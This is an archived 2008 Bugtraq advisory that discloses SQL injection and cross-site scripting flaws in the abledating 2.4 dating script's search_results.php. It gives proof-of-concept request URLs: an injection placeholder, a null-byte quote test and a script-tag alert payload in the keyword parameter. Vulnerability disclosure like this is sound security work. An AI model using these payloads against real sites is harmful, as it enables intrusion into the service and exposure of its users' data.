Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: abledating 2.4 >> Sql injection and cross site scripting on search_results.php

abledating 2.4 >> Sql injection and cross site scripting on search_results.php

From: <a.jasbi_at_yahoo.com>
Date: 22 May 2008 17:00:00 -0000
('binary' encoding is not supported, stored as-is) By : Ali Jasbi ( hackerz.ir security & hacking team)
vendor : abk-soft.com
product name : abledating 2.4
Exploits :
1- Sql injection :
bug :
http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword=[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
test :
http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=%00'&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
2-Cross site scripting :
bug :
http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>'><ScRiPt%20%0a%0d>alert(42119.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20search&photo=on
Received on May 22 2008
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]